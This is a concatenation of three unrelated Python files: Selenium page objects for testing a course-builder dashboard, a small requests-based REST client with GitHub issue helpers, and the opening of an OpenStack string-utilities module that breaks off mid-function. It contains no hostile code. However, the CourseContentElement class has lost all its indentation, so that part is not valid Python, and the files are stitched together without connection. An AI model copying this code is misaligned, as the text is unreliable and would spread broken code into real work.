        question = self._tester.driver.find_element_by_css_selector(
            '.qt-question')
        self._tester.assertEquals(question_text, question.text)
        # Leave the iframe before touching the close button in the host page.
        self._tester.driver.switch_to_default_content()
        self._tester.driver.find_element_by_css_selector(
            '#modal-window .close-button').click()
        return self

    def click_add_label(self):
        self.find_element_by_link_text('Add Label').click()
        return LabelEditorPage(self._tester)

    def verify_label_present(self, title):
        self.find_element_by_id('label_' + title)  # Exception if not found.
        return self

    def verify_label_not_present(self, title):
        try:
            self.find_element_by_id('label_' + title)  # Exception if not found.
            raise AssertionError('Unexpectedly found label %s' % title)
        except exceptions.NoSuchElementException:
            pass
        return self

    def click_edit_label(self, title):
        self.find_element_by_id('label_' + title).click()
        return LabelEditorPage(self._tester)

    def click_outline(self):
        self.find_element_by_link_text('Outline').click()
        return DashboardPage(self._tester)
class AssetsEditorPage(DashboardEditor):
    """Page object for upload image page."""

    def select_file(self, path):
        """Point the file input at a local file path."""
        file_input = self.find_element_by_name('file')
        file_input.send_keys(path)
        return self

    def click_upload_and_expect_saved(self):
        """Upload the selected file and wait for the save to complete."""
        upload_link = self.find_element_by_link_text('Upload')
        upload_link.click()
        self.expect_status_message_to_be('Saved.')
        # Page automatically redirects after successful save.
        self.wait().until(ec.title_contains('Assets'))
        return AssetsPage(self._tester)
class QuestionEditorPage(EditorPageObject):
    """Abstract superclass for page objects for add/edit questions pages."""

    def _replace_field_text(self, name, value):
        # Clear then retype so stale text never lingers in the field.
        field = self.find_element_by_name(name)
        field.clear()
        field.send_keys(value)

    def set_question(self, question):
        """Set the question body text."""
        self._replace_field_text('question', question)
        return self

    def set_description(self, description):
        """Set the question's short description."""
        self._replace_field_text('description', description)
        return self

    def click_close(self):
        return self._close_and_return_to(AssetsPage)
class MultipleChoiceEditorPage(QuestionEditorPage):
    """Page object for editing multiple choice questions."""

    def click_add_a_choice(self):
        """Append a new empty answer choice row."""
        self.find_element_by_link_text('Add a choice').click()
        return self

    def set_answer(self, n, answer):
        """Fill in the text of the nth answer choice."""
        # Answer fields are the odd-numbered gcbRteField inputs.
        field_id = 'gcbRteField-%d' % (2 * n + 1)
        answer_field = self.find_element_by_id(field_id)
        answer_field.clear()
        answer_field.send_keys(answer)
        return self

    def click_allow_only_one_selection(self):
        raise NotImplementedError

    def click_allow_multiple_selections(self):
        raise NotImplementedError
class ShortAnswerEditorPage(QuestionEditorPage):
    """Page object for editing short answer questions."""

    def click_add_an_answer(self):
        """Append a new grader row to the answer list."""
        self.find_element_by_link_text('Add an answer').click()
        return self

    def set_score(self, n, score):
        """Set the score awarded by the nth grader row."""
        score_el = self.find_element_by_name('graders[%d]score' % n)
        score_el.clear()
        # Bug fix: WebElement has no 'send_key' method; the original call
        # raised AttributeError at runtime. The correct API is 'send_keys'.
        score_el.send_keys(score)
        # Return self for chaining, consistent with the sibling setters.
        return self

    def set_response(self, n, response):
        """Set the expected response text for the nth grader row."""
        response_el = self.find_element_by_name('graders[%d]response' % n)
        response_el.clear()
        # Bug fix: 'send_key' -> 'send_keys' (same defect as set_score).
        response_el.send_keys(response)
        return self

    def click_delete_this_answer(self, n):
        raise NotImplementedError
class LabelEditorPage(EditorPageObject):
    """Editor lightbox for creating and editing course labels."""

    def set_title(self, text):
        """Replace the label title with text."""
        field = self.find_element_by_name('title')
        field.clear()
        field.send_keys(text)
        return self

    def verify_title(self, text):
        field = self.find_element_by_name('title')
        self._tester.assertEqual(text, field.get_attribute('value'))
        return self

    def set_description(self, description):
        """Replace the label description with description."""
        field = self.find_element_by_name('description')
        field.clear()
        field.send_keys(description)
        return self

    def verify_description(self, description):
        field = self.find_element_by_name('description')
        self._tester.assertEqual(
            description, field.get_attribute('value'))
        return self

    def set_type(self, type_num):
        # Label types render as inputEx radio buttons.
        self.find_element_by_id('_inputex_radioId%d' % type_num).click()
        return self

    def verify_type(self, type_num):
        radio = self.find_element_by_id('_inputex_radioId%d' % type_num)
        self._tester.assertEqual('true', radio.get_attribute('checked'))
        return self

    def click_delete(self):
        self.find_element_by_link_text('Delete').click()
        return self

    def confirm_delete(self):
        # Deleting pops a browser alert that must be accepted.
        self._tester.driver.switch_to_alert().accept()
        return AssetsPage(self._tester)

    def click_close(self):
        return self._close_and_return_to(AssetsPage)
class ImageEditorPage(EditorPageObject):
    """Page object for the dashboard's view/delete image page."""

    def click_delete(self):
        delete_link = self.find_element_by_link_text('Delete')
        delete_link.click()
        return self

    def confirm_delete(self):
        # Deleting pops a browser alert that must be accepted.
        self._tester.driver.switch_to_alert().accept()
        return AssetsPage(self._tester)
class Import(DashboardEditor):
    """Page object to model the dashboard's unit/lesson organizer."""
    # No behavior beyond the generic DashboardEditor editor lifecycle.
    pass
class AddLink(DashboardEditor):
    """Page object to model the dashboard's link editor."""

    def __init__(self, tester):
        super(AddLink, self).__init__(tester)
        # Construction is complete only once the editor confirms the new
        # link has been persisted.
        self.expect_status_message_to_be(
            'New link has been created and saved.')
class CourseContentElement(DashboardEditor):
RTE_EDITOR_FORMAT = 'gcbRteField-%d_editor'
RTE_TEXTAREA_ID = 'gcbRteField-0'
def set_title(self, title):
title_el = self.find_element_by_name('title')
title_el.clear()
title_el.send_keys(title)
return self
def click_rich_text(self, index=0):
self.wait_until_status_message_hidden()
el = self.find_element_by_css_selector('div.rte-control', index)
self._tester.assertEqual('Rich Text', el.text)
el.click()
self.wait().until(ec.element_to_be_clickable(
(by.By.ID, CourseContentElement.RTE_EDITOR_FORMAT % index)))
return self
def click_plain_text(self, index=None):
el = self.find_element_by_css_selector('div.rte-control', index)
self._tester.assertEqual('<HTML>', el.text)
el.click()
return self
def click_rte_add_custom_tag(self, index=0):
self.find_element_by_link_text(
'Insert Google Course Builder component', index).click()
return self
def select_rte_custom_tag_type(self, option_text):
"""Select the given option from the custom content type selector."""
self._ensure_rte_iframe_ready_and_switch_to_it()
select_tag = self.find_element_by_name('tag')
for option in select_tag.find_elements_by_tag_name('option'):
if option.text == option_text:
option.click()
break
else:
self._tester.fail('No option "%s" found' % option_text)
self.wait().until(ec.element_to_be_clickable(
(by.By.PARTIAL_LINK_TEXT, 'Close')))
self._tester.driver.switch_to_default_content()
return self
def _ensure_rte_iframe_ready_and_switch_to_it(self):
self.wait().until(
ec.frame_to_be_available_and_switch_to_it('modal-editor-iframe'))
# Ensure inputEx has initialized too
self.wait().until(
ec.element_to_be_clickable(
(by.By.PARTIAL_LINK_TEXT, 'Close')))
def set_rte_lightbox_field(self, field_css_selector, value):
self._ensure_rte_iframe_ready_and_switch_to_it()
field = self.find_element_by_css_selector(field_css_selector)
field.clear()
field.send_keys(value)
self._tester.driver.switch_to_default_content()
return self
def click_rte_save(self):
self._ensure_rte_iframe_ready_and_switch_to_it()
self.find_element_by_link_text('Save').click()
self._tester.driver.switch_to_default_content()
return self
def send_rte_text(self, text):
# Work around Selenium bug: If focus is in another window
# and in a text area, send_keys won't work. Steal focus
# immediately before sending keys.
# https://code.google.com/p/selenium/issues/detail?id=2977
self._tester.driver.execute_script('window.focus();')
textarea = self.find_element_by_id('gcbRteField-0_editor')
textarea.click()
textarea.send_keys(keys.Keys.HOME)
textarea.send_keys(text)
return self
def doubleclick_rte_element(self, elt_css_selector, index=0):
self._tester.driver.switch_to_frame(
CourseContentElement.RTE_EDITOR_FORMAT % index)
target = self.find_element_by_css_selector(elt_css_selector)
action_chains.ActionChains(
self._tester.driver).double_click(target).perform()
self._tester.driver.switch_to_default_content()
return self
def ensure_rte_lightbox_field_has_value(self, field_css_selector, value):
self._ensure_rte_iframe_ready_and_switch_to_it()
self._tester.assertEqual(
value,
self.find_element_by_css_selector(
field_css_selector).get_attribute('value'))
self._tester.driver.switch_to_default_content()
return self
def _get_rte_contents(self):
return self.find_element_by_id(
CourseContentElement.RTE_TEXTAREA_ID).get_attribute('value')
def _get_instanceid_list(self):
"""Returns a list of the instanceid attrs in the lesson body."""
html = self._get_rte_contents()
html_list = html.split(' instanceid="')
instanceid_list = []
for item in html_list[1:]:
closing_quote_ind = item.find('"')
instanceid_list.append(item[:closing_quote_ind])
return instanceid_list
def ensure_instanceid_count_equals(self, value):
self._tester.assertEqual(value, len(self._get_instanceid_list()))
return self
def take_snapshot_of_instanceid_list(self, list_to_fill=None):
self.instanceid_list_snapshot = self._get_instanceid_list()
if list_to_fill is not None:
list_to_fill.extend(self.instanceid_list_snapshot)
return self
def ensure_instanceid_list_matches_last_snapshot(self):
self._tester.assertEqual(
self.instanceid_list_snapshot, self._get_instanceid_list())
return self
def _codemirror_is_ready_builder(self, nth_instance):
def codemirror_is_ready(unused_driver):
return self._tester.driver.execute_script(
"return $('.CodeMirror')[%s]"
".CodeMirror.gcbCodeMirrorMonitor.cmReady;" % nth_instance)
return codemirror_is_ready
    def setvalue_codemirror(self, nth_instance, code_body):
        """Replace the full text of the nth CodeMirror editor on the page.

        NOTE(review): code_body is spliced into a single-quoted JS string
        without escaping, so bodies containing quotes or backslashes would
        break the script -- assumed callers pass simple literals; confirm.
        """
        # Wait until the editor reports itself ready before mutating it.
        self.wait().until(self._codemirror_is_ready_builder(nth_instance))
        self._tester.driver.execute_script(
            "$('.CodeMirror')[%s].CodeMirror.setValue('%s');" % (
                nth_instance, code_body))
        return self
def assert_equal_codemirror(self, nth_instance, expected_code_body):
self.wait().until(self._codemirror_is_ready_builder(nth_instance))
actual_code_body = self._tester.driver.execute_script(
"return $('.CodeMirror')[%s].CodeMirror.getValue();" % nth_instance)
self._tester.assertEqual(expected_code_body, actual_code_body)
return self
class AddUnit(CourseContentElement):
    """Page object to model the dashboard's add unit editor."""
    CREATION_MESSAGE = 'New unit has been created and saved.'
    LOADED_MESSAGE = 'Success.'
    INDEX_UNIT_HEADER = 0
    INDEX_UNIT_FOOTER = 1

    def __init__(self, tester, expected_message):
        super(AddUnit, self).__init__(tester)
        # The editor is only usable once the expected status appears.
        self.expect_status_message_to_be(expected_message)

    def set_pre_assessment(self, assessment_name):
        """Select the named assessment in the 'pre_assessment' dropdown."""
        select.Select(self.find_element_by_name(
            'pre_assessment')).select_by_visible_text(assessment_name)
        return self

    def set_post_assessment(self, assessment_name):
        """Select the named assessment in the 'post_assessment' dropdown."""
        select.Select(self.find_element_by_name(
            'post_assessment')).select_by_visible_text(assessment_name)
        return self

    def set_contents_on_one_page(self, setting):
        """Set the 'Show Contents on One Page' checkbox to `setting`.

        Locates the checkbox by finding the label text and walking up to
        the enclosing divs, then clicks only if the current state differs.
        """
        # Fix: removed a stray debug `print` statement left over here.
        labels = self._tester.driver.find_elements_by_tag_name('label')
        one_page_label = None
        for label in labels:
            if label.text == 'Show Contents on One Page':
                one_page_label = label
                break
        # Fail with a clear assertion rather than AttributeError on None.
        self._tester.assertIsNotNone(one_page_label)
        label_div = one_page_label.find_element_by_xpath('..')
        checkbox_div = label_div.find_element_by_xpath('..')
        checkbox = checkbox_div.find_element_by_css_selector(
            'input[type="checkbox"]')
        if checkbox.is_selected() != setting:
            checkbox.click()
        return self
class AddAssessment(CourseContentElement):
    """Page object to model the dashboard's assessment editor."""
    # Presumably indices of the RTE instances on the assessment editor
    # page -- TODO confirm against callers.
    INDEX_CONTENT = 0
    INDEX_REVIEWER_FEEDBACK = 1

    def __init__(self, tester):
        super(AddAssessment, self).__init__(tester)
        # The editor is only usable once the save confirmation appears.
        self.expect_status_message_to_be(
            'New assessment has been created and saved.')
class AddLesson(CourseContentElement):
    """Page object to model the dashboard's lesson editor."""

    def __init__(self, tester):
        super(AddLesson, self).__init__(tester)
        self.instanceid_list_snapshot = []
        self.expect_status_message_to_be(
            'New lesson has been created and saved.')

    def ensure_lesson_body_textarea_matches_regex(self, regex):
        """Assert the raw lesson body HTML matches the given regex."""
        self._tester.assertRegexpMatches(self._get_rte_contents(), regex)
        return self

    def _select_scored_option(self, option_label):
        # Both scoring modes live in the same 'scored' <select> control.
        select.Select(self.find_element_by_name(
            'scored')).select_by_visible_text(option_label)

    def set_questions_are_scored(self):
        """Switch the lesson's questions into scored mode."""
        self._select_scored_option('Questions are scored')
        return self

    def set_questions_give_feedback(self):
        """Switch the lesson's questions into feedback-only mode."""
        self._select_scored_option('Questions only give feedback')
        return self
class Organize(DashboardEditor):
    """Page object to model the dashboard's unit/lesson organizer."""
    # No organizer-specific behavior yet; inherits everything from
    # DashboardEditor.
    pass
class AdminPage(PageObject):
    """Page object to model the interactions with the admin landing page."""

    def click_add_course(self):
        """Press 'Add Course' and land on the course creation editor."""
        self.find_element_by_id('add_course').click()
        return AddCourseEditorPage(self._tester)

    def click_settings(self):
        """Follow the 'Settings' link to the admin settings page."""
        self.find_element_by_link_text('Settings').click()
        return AdminSettingsPage(self._tester)
class AdminSettingsPage(PageObject):
    """Page object for the admin settings."""

    def click_override_admin_user_emails(self):
        """Open the override editor via the first gcb button on the page."""
        self._tester.driver.find_elements_by_css_selector(
            'button.gcb-button')[0].click()
        return ConfigPropertyOverridePage(self._tester)

    def click_override(self, setting_name):
        """Open the override editor for the named setting."""
        self.find_element_by_id(setting_name).click()
        return ConfigPropertyOverridePage(self._tester)

    def verify_admin_user_emails_contains(self, email):
        """Assert the admin-emails config row mentions the given address.

        Uses assertIn rather than assertTrue(x in y) so a failure
        reports both the needle and the haystack.
        """
        self._tester.assertIn(
            email,
            self._tester.driver.find_elements_by_css_selector(
                'table.gcb-config tr')[1].find_elements_by_css_selector(
                    'td')[1].text)
class ConfigPropertyOverridePage(EditorPageObject):
    """Page object for the admin property override editor."""

    def clear_value(self):
        """Empty the 'value' form field without submitting."""
        element = self.find_element_by_name('value')
        element.clear()
        return self

    def set_value(self, value):
        """Set the 'value' field; bool settings are toggled via checkbox.

        For bool values the 'value' input's string is compared against
        str(value), and the sibling checkbox is toggled only when they
        differ; non-bool values are simply typed into the field.
        """
        element = self.find_element_by_name('value')
        if type(value) is bool:
            current_value = element.get_attribute('value').lower()
            if str(value).lower() != current_value:
                # The clickable control is a checkbox next to the named
                # input; a space keypress toggles it.
                checkbox = get_parent_element(
                    element).find_element_by_css_selector('[type="checkbox"]')
                checkbox.send_keys(' ')  # Toggle, iff necessary.
        else:
            element.send_keys(value)
        return self

    def click_close(self):
        """Dismiss the editor and return to the admin settings page."""
        return self._close_and_return_to(AdminSettingsPage)
class AddCourseEditorPage(EditorPageObject):
    """Page object for the dashboards' add course page."""

    def set_fields(self, name=None, title=None, email=None):
        """Populate the fields in the add course page."""
        name_field = self.find_element_by_name('name')
        title_field = self.find_element_by_name('title')
        email_field = self.find_element_by_name('admin_email')
        # Clear all three fields first, then type only the values given.
        for field in (name_field, title_field, email_field):
            field.clear()
        for field, value in ((name_field, name),
                             (title_field, title),
                             (email_field, email)):
            if value:
                field.send_keys(value)
        return self

    def click_close(self):
        """Dismiss the editor and return to the admin page."""
        return self._close_and_return_to(AdminPage)
class AnalyticsPage(PageObject):
    """Page object for analytics sub-tab."""

    def wait_until_logs_not_empty(self, data_source):
        """Block until the given data source has emitted some log text."""
        def data_source_logs_not_empty(unused_driver):
            return self.get_data_source_logs(data_source)
        self.wait().until(data_source_logs_not_empty)
        return self

    def get_data_page_number(self, data_source):
        """Return the current data page number for one data source."""
        # When there is a chart on the page, the chart-drawing animation
        # takes ~1 sec to complete, which blocks the JS to unpack and paint
        # the data page numbers.
        max_wait = time.time() + 10
        text = self.find_element_by_id('model_visualizations_dump').text
        # Poll until the dump element has content or the deadline passes.
        while not text and time.time() < max_wait:
            time.sleep(0.1)
            text = self.find_element_by_id('model_visualizations_dump').text
        # The dump is newline-separated 'name=value' pairs.
        numbers = {}
        for line in text.split('\n'):
            name, value = line.split('=')
            numbers[name] = int(value)
        return numbers[data_source]

    def get_displayed_page_number(self, data_source):
        """Return the page number text shown for one data source."""
        return self.find_element_by_id('gcb_rest_source_page_number_' +
                                       data_source).text

    def get_data_source_logs(self, data_source):
        """Return the log text for one data source."""
        return self.find_element_by_id(
            'gcb_log_rest_source_' + data_source).text

    def get_page_level_logs(self):
        """Return page-level (not per-source) error log text."""
        return self.find_element_by_id('gcb_rest_source_errors').text

    def click(self, data_source, button):
        """Press a paging button ('zero', etc.) for one data source."""
        name = 'gcb_rest_source_page_request_' + button + '_' + data_source
        self.find_element_by_id(name).click()

    def buttons_present(self, data_source):
        """Whether the paging buttons for this data source are rendered."""
        try:
            self.find_element_by_id('gcb_rest_source_request_zero_' +
                                    data_source)
            return True
        except exceptions.NoSuchElementException:
            return False

    def set_chunk_size(self, data_source, chunk_size):
        """Type a new chunk size into the data source's chunk-size field."""
        field = self.find_element_by_id(
            'gcb_rest_source_chunk_size_' + data_source)
        field.clear()
        field.send_keys(str(chunk_size))

    def answers_pie_chart_present(self):
        """Whether the answers pie chart has rendered at least one SVG."""
        div = self.find_element_by_id('answers_pie_chart')
        svgs = div.find_elements_by_tag_name('svg')
        # pylint: disable-msg=g-explicit-length-test
        return len(svgs) > 0
class AppengineAdminPage(PageObject):
    """Page object for the App Engine admin console."""

    def __init__(self, tester, base_url, course_name):
        super(AppengineAdminPage, self).__init__(tester)
        self._base_url = base_url
        self._course_name = course_name

    def get_datastore(self, entity_kind):
        """Open the datastore viewer for one entity kind in this course."""
        viewer_url = (self._base_url + '/datastore' +
                      '?namespace=ns_%s' % self._course_name +
                      '&kind=%s' % entity_kind)
        self.get(viewer_url)
        return DatastorePage(self._tester)
class DatastorePage(PageObject):
    """Page object for the datastore viewer's entity listing."""

    def get_items(self):
        """Scrape all listed entities; returns a list of name->value dicts.

        Two passes: first collect each entity's detail-page URL from the
        'Key' column of the listing table, then visit each detail page
        and read its labeled fields.
        """
        data_table = self._tester.driver.find_element_by_css_selector(
            'table.ae-table')
        title_elements = data_table.find_elements_by_css_selector(
            'table.ae-table th')
        # Locate the 'Key' column.
        # NOTE(review): if no 'Key' header exists, key_index stays unbound
        # and the loop below raises NameError -- presumably the viewer
        # always renders this column; confirm before reusing elsewhere.
        for index, element in enumerate(title_elements):
            if element.text.strip() == 'Key':
                key_index = index
        rows = data_table.find_elements_by_css_selector('tr')
        data_urls = []
        # Pass 1: collect detail-page URLs (header rows have no <td>).
        for row in rows:
            cells = row.find_elements_by_css_selector('td')
            if len(cells) > key_index:
                url = cells[key_index].find_elements_by_tag_name(
                    'a')[0].get_attribute('href')
                data_urls.append(url)
        data = []
        # Pass 2: visit each detail page and scrape labeled fields.
        for data_url in data_urls:
            self.get(data_url)
            rows = self._tester.driver.find_elements_by_css_selector(
                'div.ae-settings-block')
            item = {}
            data.append(item)
            for row in rows:
                labels = row.find_elements_by_tag_name('label')
                if labels:
                    # Field name, minus any parenthesized annotation.
                    name = re.sub(r'\(.*\)', '', labels[0].text).strip()
                    value_blocks = row.find_elements_by_tag_name('div')
                    if value_blocks:
                        # Editable fields render an <input>; read-only
                        # ones expose plain text.
                        inputs = value_blocks[0].find_elements_by_tag_name(
                            'input')
                        if inputs:
                            value = inputs[0].get_attribute('value').strip()
                        else:
                            value = value_blocks[0].text.strip()
                        item[name] = value
            self._tester.driver.back()
        return data
|
|
import json
import urlparse
from requests.auth import HTTPBasicAuth
import requests
def show_me_the_logs():
    """Turns on debug-level logging in requests

    This helps to find out wtf is going wrong.
    """
    # Note: httplib is the Python 2 module name (http.client on Python 3).
    import httplib
    httplib.HTTPConnection.debuglevel = 1

    import logging
    # you need to initialize logging, otherwise you will not see
    # anything from requests
    logging.basicConfig()
    logging.getLogger().setLevel(logging.DEBUG)
    requests_log = logging.getLogger("requests.packages.urllib3")
    requests_log.setLevel(logging.DEBUG)
    requests_log.propagate = True
class RestAPIException(Exception):
    """Base exception for REST API errors.

    Any keyword arguments passed (e.g. ``response``) are attached to the
    instance as attributes; positional args behave as for Exception.
    """

    def __init__(self, *args, **kwargs):
        # Expose keyword arguments (such as the requests Response) as
        # instance attributes, then run normal Exception initialization.
        self.__dict__.update(kwargs)
        super(RestAPIException, self).__init__(*args)
class Http4xxException(RestAPIException):
    """Exception for 4xx errors.

    These usually mean you did something wrong.

    :property response: The full requests `Response` object.

    Example::

        from steve.restapi import Http4xxException

        try:
            # do something here
        except Http4xxException as exc:
            # oh noes! i did something wrong!

            # This tells you the actual HTTP status code
            print exc.response.status_code

            # This tells you the content of the response---sometimes
            # the server will tell you an error message and it's
            # probably in here.
            print exc.response.content
    """
    pass
class Http5xxException(RestAPIException):
    """Exception for 5xx errors.

    These usually mean the server did something wrong. Let me know.

    :property response: The full requests `Response` object.

    Example::

        from steve.restapi import Http5xxException

        try:
            # do something here
        except Http5xxException as exc:
            # oh noes! the server is broken!

            # This tells you the actual HTTP status code
            print exc.response.status_code

            # This tells you the content of the response---sometimes
            # the server will tell you an error message and it's
            # probably in here.
            print exc.response.content
    """
    pass
def urljoin(base, *args):
    """Add bits to the url path."""
    parts = list(urlparse.urlsplit(base))
    # Rebuild the path from its non-empty segments plus the new bits.
    segments = [seg for seg in parts[2].split('/') if seg]
    segments.extend(args)
    parts[2] = '/'.join(segments)
    return urlparse.urlunsplit(parts)
def get_content(resp):
    """Returns the JSON content from a response.

    .. Note::

       Mostly this just deals with the fact that requests changed
       `.json` from a property to a method. Once that settles out and
       we can use requests >= 1.0, then we can ditch this.
    """
    try:
        # requests changed from a .json property to a .json method,
        # so, deal with both here.
        if callable(resp.json):
            return resp.json()
        else:
            return resp.json
    except Exception as exc:
        # TODO: Fix this. The requests docs say that .json throws an
        # exception but doesn't specify which one. Need to toss some
        # bad "json" at it and see what it does so we can make this
        # except suck less.
        # Falls back to the raw body text when JSON decoding fails.
        print 'Error: get_content threw {0}'.format(exc)
        return resp.text
class Resource(object):
    """Convenience wrapper for requests.request.

    HTTP methods return requests Response objects or throw
    exceptions in cases where things are weird.
    """
    def __init__(self, **kwargs):
        # Keep the raw kwargs so __call__ can clone this resource with an
        # id appended to the URL path.
        self._kwargs = kwargs
        url = kwargs['url']
        id_ = kwargs.get('id')
        if id_:
            url = urljoin(url, str(id_))
        self._kwargs['url'] = url
        # One session per resource so connections/cookies are reused.
        self.session = requests.session()

    def __call__(self, id_):
        """Return a copy of this resource scoped to one item id."""
        kwargs = dict(self._kwargs)
        kwargs['id'] = id_
        return Resource(**kwargs)

    def _get_auth_header(self, auth_token):
        # Returns an Authorization header dict, or {} when no token given.
        if auth_token is not None:
            return {
                'Authorization': 'Basic {0}'.format(auth_token)
            }
        return {}

    def _request(self, method, data=None, params=None, headers=None,
                 url=None, auth=None):
        """Issue one HTTP request; raise Http4xx/5xxException on errors."""
        if not url:
            url = self._kwargs['url']
        # JSON in/out by default; caller headers override these.
        default_headers = {
            'Content-Type': 'application/json',
            'Accept': 'application/json'
        }
        if headers:
            default_headers.update(headers)

        args = {
            'data': data,
            'params': params,
            'headers': default_headers,
        }
        if auth:
            args['auth'] = auth

        resp = self.session.request(method, url, **args)

        if 400 <= resp.status_code <= 499:
            # Dump the response before raising to help debugging.
            print resp.headers
            print resp.content
            raise Http4xxException(
                'HTTP {0}: {1} {2}'.format(resp.status_code, method, url),
                response=resp)
        elif 500 <= resp.status_code <= 599:
            raise Http5xxException(
                'HTTP {0}: {1} {2}'.format(resp.status_code, method, url),
                response=resp)
        return resp

    def get(self, auth=None, **kwargs):
        """GET this resource; kwargs become query parameters.

        `auth` is a 'user:password' string, converted to HTTP basic auth.
        """
        args = {
            'params': kwargs
        }
        if auth:
            args['auth'] = HTTPBasicAuth(*(auth.split(':')))
        resp = self._request('GET', **args)
        if 200 <= resp.status_code <= 299:
            return resp
        raise RestAPIException(
            'Unknown response: {0}'.format(resp.status_code),
            response=resp)

    def post(self, data, auth_token=None, **kwargs):
        """POST `data` as JSON; follows a Location header if one is set."""
        jsondata = json.dumps(data)
        headers = self._get_auth_header(auth_token)
        resp = self._request('POST', data=jsondata, params=kwargs,
                             headers=headers)
        if resp.status_code in (201, 301, 302, 303, 307):
            location = resp.headers.get('location')
            if location:
                # Fetch the newly created/redirected representation.
                return self._request('GET', params=kwargs, url=location)
            return resp
        elif 200 <= resp.status_code <= 299:
            return resp
        raise RestAPIException(
            'Unknown response: {0}'.format(resp.status_code),
            response=resp)

    def put(self, data, auth_token=None, **kwargs):
        """PUT `data` as JSON; follows redirects and re-GETs empty bodies.

        NOTE(review): unlike post(), this indexes resp.headers['location']
        directly, so a redirect without a Location header raises KeyError.
        """
        jsondata = json.dumps(data)
        headers = self._get_auth_header(auth_token)
        resp = self._request('PUT', data=jsondata, params=kwargs,
                             headers=headers)
        if resp.status_code in (201, 301, 302, 303, 307):
            location = resp.headers['location']
            return self._request('GET', params=kwargs, url=location)
        elif 200 <= resp.status_code <= 299:
            # If the server didn't return the data or a redirect, we
            # go fetch it.
            if not resp.json:
                resp = self._request('GET', params=kwargs)
            return resp
        raise RestAPIException(
            'Unknown response: {0}'.format(resp.status_code),
            response=resp)

    def delete(self, auth_token=None, **kwargs):
        """DELETE this resource with optional token auth."""
        headers = self._get_auth_header(auth_token)
        resp = self._request('DELETE', params=kwargs, headers=headers)
        if 200 <= resp.status_code <= 299:
            return resp
        raise RestAPIException(
            'Unknown response: {0}'.format(resp.status_code),
            response=resp)
class API(object):
    """Convenience wrapper around requests.

    Example::

        from steve.restapi import API

        # Creates an api endpoint
        api = API('http://pyvideo.org/v1/api/')

        # Does a get for all videos
        all_videos = api.video.get()

        # Does a get for video with a specific id
        video_1 = api.video(1).get()

        # Update the data and then put it
        video_1['somekey'] = 'newvalue'
        api.video(1).put(data=video_1)

        # Create a new video. This does a POST and if there's a
        # redirect, will pick that up.
        newvideo = api.video.post(data={'somekey': 'newvalue'})
    """
    def __init__(self, base_url):
        self.base_url = base_url

    def __getattr__(self, key):
        # __getattr__ is only invoked after normal attribute lookup has
        # failed, so instance attributes like base_url never reach this
        # point; the old `if key in self.__dict__` guard was dead code
        # and has been removed. Every miss is treated as a resource name.
        return Resource(url=urljoin(self.base_url, str(key)))
def get_issues(owner, repo, auth=None):
    """Fetch the list of issues for a GitHub repository as JSON."""
    endpoint = API('https://api.github.com/repos/{user}/{repo}'.format(
        user=owner, repo=repo))
    return endpoint.issues.get(auth=auth).json()
def get_issue_details(owner, repo, number, auth=None):
    """Fetch one GitHub issue, adding its comments as 'comments_list'."""
    issue_api = API('https://api.github.com/repos/{user}/{repo}'.format(
        user=owner, repo=repo))
    details = issue_api.issues(number).get(auth=auth).json()
    # Only hit the comments endpoint when the issue reports any comments.
    if not details['comments']:
        details['comments_list'] = []
    else:
        comments_api = API(
            'https://api.github.com/repos/{user}/{repo}/issues/{num}'.format(
                user=owner, repo=repo, num=number))
        details['comments_list'] = comments_api.comments.get().json()
    return details
|
|
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
System-level utilities and helper functions.
"""
import re
import sys
import unicodedata
import six
from kwrankingclient.openstack.common.gettextutils import _
# Used for looking up extensions of text
# to their 'multiplied' byte amount
# Maps a lowercased size suffix (with any trailing 'b' removed by
# to_bytes()) to its byte multiplier; '' means plain bytes.
BYTE_MULTIPLIERS = {
    '': 1,
    't': 1024 ** 4,
    'g': 1024 ** 3,
    'm': 1024 ** 2,
    'k': 1024,
}
# Splits a size string into a leading (possibly negative) integer and a
# trailing non-digit unit suffix.
BYTE_REGEX = re.compile(r'(^-?\d+)(\D*)')

# Lowercased literals recognized by bool_from_string().
TRUE_STRINGS = ('1', 't', 'true', 'on', 'y', 'yes')
FALSE_STRINGS = ('0', 'f', 'false', 'off', 'n', 'no')

# Used by to_slug(): characters to strip, and whitespace/hyphen runs to
# collapse into single hyphens.
SLUGIFY_STRIP_RE = re.compile(r"[^\w\s-]")
SLUGIFY_HYPHENATE_RE = re.compile(r"[-\s]+")
def int_from_bool_as_string(subject):
    """Interpret a string as a boolean and return either 1 or 0.

    Any string value in:

        ('True', 'true', 'On', 'on', '1')

    is interpreted as a boolean True.

    Useful for JSON-decoded stuff and config file parsing
    """
    # A conditional expression replaces the legacy `and 1 or 0` trick,
    # which predates conditional expressions and is harder to read.
    return 1 if bool_from_string(subject) else 0
def bool_from_string(subject, strict=False):
    """Interpret a string as a boolean.

    A case-insensitive match is performed such that strings matching 't',
    'true', 'on', 'y', 'yes', or '1' are considered True and, when
    `strict=False`, anything else is considered False.

    Useful for JSON-decoded stuff and config file parsing.

    If `strict=True`, unrecognized values, including None, will raise a
    ValueError which is useful when parsing values passed in from an API call.
    Strings yielding False are 'f', 'false', 'off', 'n', 'no', or '0'.
    """
    # Non-strings (including None) are stringified before matching.
    if not isinstance(subject, six.string_types):
        subject = str(subject)

    normalized = subject.strip().lower()
    if normalized in TRUE_STRINGS:
        return True
    if normalized in FALSE_STRINGS:
        return False
    if strict:
        acceptable = ', '.join(
            "'%s'" % s for s in sorted(TRUE_STRINGS + FALSE_STRINGS))
        msg = _("Unrecognized value '%(val)s', acceptable values are:"
                " %(acceptable)s") % {'val': subject,
                                      'acceptable': acceptable}
        raise ValueError(msg)
    return False
def safe_decode(text, incoming=None, errors='strict'):
    """Decodes incoming str using `incoming` if they're not already unicode.

    :param incoming: Text's current encoding
    :param errors: Errors handling policy. See here for valid
        values http://docs.python.org/2/library/codecs.html
    :returns: text or a unicode `incoming` encoded
                representation of it.
    :raises TypeError: If text is not an instance of str
    """
    if not isinstance(text, six.string_types):
        raise TypeError("%s can't be decoded" % type(text))

    # Already unicode: nothing to do.
    if isinstance(text, six.text_type):
        return text

    # Default to the terminal's encoding, falling back to the
    # interpreter default.
    if not incoming:
        incoming = (sys.stdin.encoding or
                    sys.getdefaultencoding())

    try:
